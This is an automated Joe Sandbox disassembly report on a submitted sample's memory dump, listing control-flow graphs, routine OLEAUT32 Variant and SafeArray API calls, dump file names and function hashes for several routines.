                                            • Instruction ID: 4e92d9ed41312c090286c6bbbb73a53fe2ce01913bad919fe4fcb8820eb517ca
                                            • Opcode Fuzzy Hash: 4a4ef4b4333fac1039a7d6ab00404df7ce06c4c11b0bdab7a349ef0f98611f53
                                            • Instruction Fuzzy Hash: 1A819C71A00219AFDF04DFA8C884FEEBBB9FF49318F544159E905AB240DB75E945CBA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1362 689664d0-68966552 VariantInit * 3 SafeArrayCreateVector 1363 68966554-68966559 1362->1363 1364 6896655c-6896657e SafeArrayPutElement VariantClear 1362->1364 1363->1364 1365 68966584-689665a1 1364->1365 1366 68966661-68966663 1364->1366 1367 689665a3-689665a6 1365->1367 1368 689665ab-689665c7 SafeArrayPutElement VariantClear 1365->1368 1369 68966665-68966666 SafeArrayDestroy 1366->1369 1370 6896666c-6896669d VariantClear * 3 1366->1370 1367->1368 1368->1366 1371 689665cd-689665db 1368->1371 1369->1370 1372 689665e7-68966613 1371->1372 1373 689665dd-689665e2 call 689bc1e0 1371->1373 1385 68966616 call f9d149 1372->1385 1386 68966616 call f9d148 1372->1386 1373->1372 1375 68966618-6896661a 1375->1366 1376 6896661c-68966628 1375->1376 1376->1366 1377 6896662a-6896663c call 6895db30 1376->1377 1377->1366 1380 6896663e-68966650 call 689656b0 call 68966880 1377->1380 1384 68966655-6896665c 1380->1384 1384->1366 1385->1375 1386->1375
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6896650C
                                            • VariantInit.OLEAUT32(?), ref: 68966519
                                            • VariantInit.OLEAUT32(?), ref: 68966520
                                            • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 68966531
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896656D
                                            • VariantClear.OLEAUT32(?), ref: 68966576
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 689665B6
                                            • VariantClear.OLEAUT32(?), ref: 689665BF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68966666
                                            • VariantClear.OLEAUT32(?), ref: 68966677
                                            • VariantClear.OLEAUT32(?), ref: 6896667E
                                            • VariantClear.OLEAUT32(?), ref: 68966685
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 1625659656-0
                                            • Opcode ID: ffdf950350e90a70fb06f5c46c931d590419557791b66f7fcd2a8fd8c6162302
                                            • Instruction ID: 2f08e201dabfb1905840f52e200181af8e06a79d97c96ac8f1b5890afc59387c
                                            • Opcode Fuzzy Hash: ffdf950350e90a70fb06f5c46c931d590419557791b66f7fcd2a8fd8c6162302
                                            • Instruction Fuzzy Hash: 635139722083059FD701DF64C880A5BBBF8EFD9714F40891EFAA587250EB71E905CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1387 6896cb90-6896cc11 VariantInit * 2 SafeArrayCreateVector * 2 SafeArrayPutElement 1388 6896cce7-6896cce9 1387->1388 1389 6896cc17-6896cc4b SafeArrayPutElement VariantClear 1387->1389 1390 6896ccf2-6896cd18 VariantClear * 2 1388->1390 1391 6896cceb-6896ccec SafeArrayDestroy 1388->1391 1389->1388 1392 6896cc51-6896cc61 SafeArrayPutElement 1389->1392 1391->1390 1392->1388 1393 6896cc67-6896cc7b SafeArrayPutElement 1392->1393 1393->1388 1394 6896cc7d-6896cc8e 1393->1394 1395 6896cc90-6896cc95 call 689bc1e0 1394->1395 1396 6896cc9a-6896ccc8 1394->1396 1395->1396 1401 6896ccc9 call f9d149 1396->1401 1402 6896ccc9 call f9d148 1396->1402 1398 6896cccb-6896cccd 1398->1388 1399 6896cccf-6896cce1 1398->1399 1399->1388 1400 6896cce3 1399->1400 1400->1388 1401->1398 1402->1398
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896CBCA
                                            • VariantInit.OLEAUT32(?), ref: 6896CBD3
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6896CBE4
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6896CBF6
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896CC0D
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6896CC39
                                            • VariantClear.OLEAUT32(?), ref: 6896CC42
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6896CC5D
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6896CC77
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6896CCEC
                                            • VariantClear.OLEAUT32(?), ref: 6896CCFC
                                            • VariantClear.OLEAUT32(?), ref: 6896CD02
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                            • String ID:
                                            • API String ID: 3548156019-0
                                            • Opcode ID: 5dbad9fdaa3b9266139f27f58693d2c9d833507079a9238f3dfcbf10dfd1edb4
                                            • Instruction ID: b8b4d9194ce963f391b5742ffd0a1af063ab11558ac5317b844cb28399100184
                                            • Opcode Fuzzy Hash: 5dbad9fdaa3b9266139f27f58693d2c9d833507079a9238f3dfcbf10dfd1edb4
                                            • Instruction Fuzzy Hash: 39515DB5E002099FDB00DFA4CC84EEEBBB8FF49714F40855AEA15A7241D775A941CBA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1403 6895a350-6895a3bd VariantInit * 3 call 689638e0 1406 6895a505-6895a528 VariantClear * 3 1403->1406 1407 6895a3c3-6895a3d6 1403->1407 1408 6895a532-6895a546 1406->1408 1409 6895a52a-6895a52d 1406->1409 1410 6895a3e0-6895a3f7 VariantCopy 1407->1410 1411 6895a3d8-6895a3dd 1407->1411 1409->1408 1412 6895a3ff-6895a411 VariantClear 1410->1412 1413 6895a3f9-6895a3fa call 689bc1e0 1410->1413 1411->1410 1415 6895a413-6895a418 call 689bc1e0 1412->1415 1416 6895a41d-6895a42b 1412->1416 1413->1412 1415->1416 1417 6895a431-6895a433 1416->1417 1418 6895a42d-6895a42f 1416->1418 1420 6895a436-6895a43a 1417->1420 1418->1420 1421 6895a440 1420->1421 1422 6895a43c-6895a43e 1420->1422 1423 6895a442-6895a477 1421->1423 1422->1423 1439 6895a47a call f9d149 1423->1439 1440 6895a47a call f9d148 1423->1440 1424 6895a47c-6895a47e 1424->1406 1425 6895a484-6895a493 1424->1425 1426 6895a495-6895a49a call 689bc1e0 1425->1426 1427 6895a49f-6895a4b0 1425->1427 1426->1427 1429 6895a4b6-6895a4b8 1427->1429 1430 6895a4b2-6895a4b4 1427->1430 1431 6895a4bb-6895a4bf 1429->1431 1430->1431 1432 6895a4c5 1431->1432 1433 6895a4c1-6895a4c3 1431->1433 1434 6895a4c7-6895a503 1432->1434 1433->1434 1434->1406 1436 6895a549-6895a578 VariantClear * 3 1434->1436 1437 6895a582-6895a596 1436->1437 1438 6895a57a-6895a57f 1436->1438 1438->1437 1439->1424 1440->1424
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$Init$Copy
                                            • String ID:
                                            • API String ID: 3214764494-0
                                            • Opcode ID: 601a00018c8a5b6b35150236395115cc1b8281d4488cc6a18b58cb2cbca8c67d
                                            • Instruction ID: 6281e93be5add24308e189e3a5b87389d62047ac60d41e2db44baed36f9d7bb5
                                            • Opcode Fuzzy Hash: 601a00018c8a5b6b35150236395115cc1b8281d4488cc6a18b58cb2cbca8c67d
                                            • Instruction Fuzzy Hash: B77145762083459FD300DF69C884A5BB7E9FF89714F408A5DFA99DB290D731E805CB62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1495 6896cd20-6896cd97 VariantInit * 3 SafeArrayCreateVector 1496 6896cda1-6896cdc0 SafeArrayPutElement VariantClear 1495->1496 1497 6896cd99-6896cd9c 1495->1497 1498 6896cdc6-6896cdd1 1496->1498 1499 6896d2a0-6896d2a2 1496->1499 1497->1496 1500 6896cdd3-6896cdd8 call 689bc1e0 1498->1500 1501 6896cddd-6896cdef 1498->1501 1502 6896d2a4-6896d2a5 SafeArrayDestroy 1499->1502 1503 6896d2ab-6896d2d7 VariantClear * 3 1499->1503 1500->1501 1501->1499 1506 6896cdf5-6896ce01 1501->1506 1502->1503 1506->1499 1507 6896ce07-6896cea4 1506->1507 1515 6896cea6-6896ceb7 1507->1515 1516 6896ceba-6896cf2b 1507->1516 1515->1516 1522 6896cf41-6896d222 1516->1522 1523 6896cf2d-6896cf3e 1516->1523 1558 6896d224-6896d229 call 689bc1e0 1522->1558 1559 6896d22e-6896d25c 1522->1559 1523->1522 1558->1559 1562 6896d25e-6896d269 1559->1562 1563 6896d29d 1559->1563 1562->1563 1564 6896d26b-6896d27b call 6895db30 1562->1564 1563->1499 1564->1563 1567 6896d27d-6896d28d call 689656b0 call 68966880 1564->1567 1571 6896d292-6896d299 1567->1571 1571->1563
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896CD5C
                                            • VariantInit.OLEAUT32(?), ref: 6896CD65
                                            • VariantInit.OLEAUT32(?), ref: 6896CD6B
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896CD76
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896CDAA
                                            • VariantClear.OLEAUT32(?), ref: 6896CDB7
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6896D2A5
                                            • VariantClear.OLEAUT32(?), ref: 6896D2B5
                                            • VariantClear.OLEAUT32(?), ref: 6896D2BB
                                            • VariantClear.OLEAUT32(?), ref: 6896D2C1
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 2515392200-0
                                            • Opcode ID: 5cd429927259d4aba13020212c09230b745ec74676a52fef6ad4539e88eb111e
                                            • Instruction ID: cdcca5604391297bb3c072bd3b3b92887c141a5ec53bdf6d485410956ff37160
                                            • Opcode Fuzzy Hash: 5cd429927259d4aba13020212c09230b745ec74676a52fef6ad4539e88eb111e
                                            • Instruction Fuzzy Hash: ED120675A15705AFD718DB94DD84DAAB3B9BF8C300F54466CF50A9BB91CA30F841CB50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1572 689666a0-68966725 VariantInit * 2 SafeArrayCreateVector 1573 68966727-6896672a 1572->1573 1574 6896672f-6896674f SafeArrayPutElement VariantClear 1572->1574 1573->1574 1575 68966844-68966846 1574->1575 1576 68966755-68966772 1574->1576 1579 6896684f-68966878 VariantClear * 2 1575->1579 1580 68966848-68966849 SafeArrayDestroy 1575->1580 1577 68966774-68966779 1576->1577 1578 6896677c-6896679c SafeArrayPutElement VariantClear 1576->1578 1577->1578 1578->1575 1581 689667a2-689667b0 1578->1581 1580->1579 1582 689667b2-689667b7 call 689bc1e0 1581->1582 1583 689667bc-689667ef 1581->1583 1582->1583 1595 689667f2 call f9d149 1583->1595 1596 689667f2 call f9d148 1583->1596 1585 689667f4-689667f6 1585->1575 1586 689667f8-68966805 1585->1586 1586->1575 1587 68966807-6896681c call 6895db30 1586->1587 1587->1575 1590 6896681e-6896683f call 689656b0 call 68966880 1587->1590 1590->1575 1595->1585 1596->1585
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 689666DB
                                            • VariantInit.OLEAUT32 ref: 689666EA
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 68966700
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896673A
                                            • VariantClear.OLEAUT32(?), ref: 68966747
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 68966787
                                            • VariantClear.OLEAUT32(?), ref: 68966794
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68966849
                                            • VariantClear.OLEAUT32(?), ref: 6896685A
                                            • VariantClear.OLEAUT32(?), ref: 68966861
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 551789342-0
                                            • Opcode ID: 46bc778c0eae33bb25863cfaada9efdbb8f56aa5ac0ae3ebba77713a57b1c894
                                            • Instruction ID: e05cc51e898218514073d24e7ae532c2093fa0e3264d475d6ecd308501563b65
                                            • Opcode Fuzzy Hash: 46bc778c0eae33bb25863cfaada9efdbb8f56aa5ac0ae3ebba77713a57b1c894
                                            • Instruction Fuzzy Hash: 3C516976208206AFD701CF64C844B9BBBE9FFD9724F008A5DF9559B250E731E905CBA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1597 6896840e-68968413 call 689bc1e0 1599 68968418-6896841f 1597->1599 1687 68968422 call f9d149 1599->1687 1688 68968422 call f9d148 1599->1688 1600 68968424-68968426 1601 6896ae53-6896ae60 1600->1601 1602 6896842c-68968443 call 6895dfb0 1600->1602 1604 6896ae62-6896ae65 SafeArrayDestroy 1601->1604 1605 6896ae68-6896ae70 1601->1605 1602->1601 1609 68968449-68968454 1602->1609 1604->1605 1607 6896ae72-6896ae75 SafeArrayDestroy 1605->1607 1608 6896ae7b-6896ae83 1605->1608 1607->1608 1610 6896ae85-6896ae88 SafeArrayDestroy 1608->1610 1611 6896ae8e-6896ae96 1608->1611 1612 68968456-68968461 1609->1612 1613 68968464-6896846f 1609->1613 1610->1611 1614 6896aea1-6896aea9 1611->1614 1615 6896ae98-6896ae9b SafeArrayDestroy 1611->1615 1612->1613 1616 68968471-6896847c 1613->1616 1617 6896847f-68968487 1613->1617 1618 6896aeb4-6896aebc 1614->1618 1619 6896aeab-6896aeae SafeArrayDestroy 1614->1619 1615->1614 1616->1617 1620 68968493-689684a9 1617->1620 1621 68968489-6896848e call 689bc1e0 1617->1621 1622 6896aec7-6896aed3 1618->1622 1623 6896aebe-6896aec1 SafeArrayDestroy 1618->1623 1619->1618 1620->1601 1629 689684af-689684e7 SafeArrayGetLBound SafeArrayGetUBound 1620->1629 1621->1620 1624 6896aed5-6896aeda 1622->1624 1625 6896aedd-6896aef8 call 689a948b 1622->1625 1623->1622 1624->1625 1631 68968616-6896862d call 6895dfb0 1629->1631 1632 689684ed-68968512 SafeArrayGetElement 1629->1632 1631->1601 1640 68968633-6896864d call 6895dfb0 1631->1640 1634 68968758-68968761 1632->1634 1635 68968518-68968523 1632->1635 1634->1601 1639 68968767-6896876f 1634->1639 1637 68968525-68968528 1635->1637 1638 6896852d-6896853b 1635->1638 1637->1638 1641 68968545-6896855a 1638->1641 1642 6896853d-68968542 1638->1642 1639->1601 1640->1601 1649 68968653-6896866d call 6895dfb0 1640->1649 1645 68968564-68968582 call 68963a90 1641->1645 1646 6896855c-68968561 1641->1646 1642->1641 1651 68968584-6896858d 1645->1651 1652 6896858f-689685ab call 68963a90 1645->1652 1646->1645 1649->1601 1659 68968673-6896868c call 6895dfb0 1649->1659 1654 689685b6-689685b9 call 6895ad80 1651->1654 1660 689685be-689685f6 call 689aa1f7 * 2 1652->1660 1661 689685ad-689685b0 1652->1661 1654->1660 1659->1601 1666 68968692-689686ac call 6895dfb0 1659->1666 1671 68968600-68968610 1660->1671 1672 689685f8-689685fd 1660->1672 1661->1654 1666->1601 1673 689686b2-689686d1 call 689669c0 1666->1673 1671->1631 1671->1632 1672->1671 1673->1601 1676 689686d7-689686f7 call 689669c0 1673->1676 1676->1601 1679 689686fd-6896870b 1676->1679 1680 68968715-68968753 call 689669c0 call 689aa1f7 1679->1680 1681 6896870d-68968712 1679->1681 1680->1601 1681->1680 1687->1600 1688->1600
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 689684BF
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 689684D2
                                            • SafeArrayGetElement.OLEAUT32 ref: 6896850A
                                              • Part of subcall function 68963A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 68963B71
                                              • Part of subcall function 68963A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68963B83
                                              • Part of subcall function 689669C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 68966A08
                                              • Part of subcall function 689669C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68966A15
                                              • Part of subcall function 689669C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68966A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                              • Part of subcall function 6895DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6895DFF6
                                              • Part of subcall function 6895DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6895E003
                                              • Part of subcall function 6895DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6895E02F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy$Element
                                            • String ID:
                                            • API String ID: 959723449-0
                                            • Opcode ID: fbe5b340ad0e455916e98f702962ff35415a7f67b76f65e92d3026cf3bb48277
                                            • Instruction ID: 2e77389715c707d836e090e348ffabc014f17781b97b8bbd298ae21675bedfd3
                                            • Opcode Fuzzy Hash: fbe5b340ad0e455916e98f702962ff35415a7f67b76f65e92d3026cf3bb48277
                                            • Instruction Fuzzy Hash: 7BC15074A002049FEB14DF68CC94FADB7BDAF85318F908598E919FB286D771E980CB50
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 689641AF
                                            • VariantInit.OLEAUT32(?), ref: 689641B5
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 689641C0
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 689641F5
                                            • VariantClear.OLEAUT32(?), ref: 68964201
                                            • std::tr1::_Xweak.LIBCPMT ref: 68964450
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896446D
                                            • VariantClear.OLEAUT32(?), ref: 6896447D
                                            • VariantClear.OLEAUT32(?), ref: 68964483
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1774866819-0
                                            • Opcode ID: b43da871488684abd17bc70d9e44ed7dca59e3491c82850acc6c6c2b9271d987
                                            • Instruction ID: 792e62438a59e2cc68c6213d671918960f0ca3803a72292eaa7b142eafbe57d5
                                            • Opcode Fuzzy Hash: b43da871488684abd17bc70d9e44ed7dca59e3491c82850acc6c6c2b9271d987
                                            • Instruction Fuzzy Hash: 4DB136756006099FCB24DF98C884DAEB7F9BF8D310F558568E50AAB790DA34F841CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896C56F
                                            • VariantInit.OLEAUT32(?), ref: 6896C575
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896C580
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896C5B5
                                            • VariantClear.OLEAUT32(?), ref: 6896C5C1
                                            • std::tr1::_Xweak.LIBCPMT ref: 6896C7D4
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896C7F1
                                            • VariantClear.OLEAUT32(?), ref: 6896C801
                                            • VariantClear.OLEAUT32(?), ref: 6896C807
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
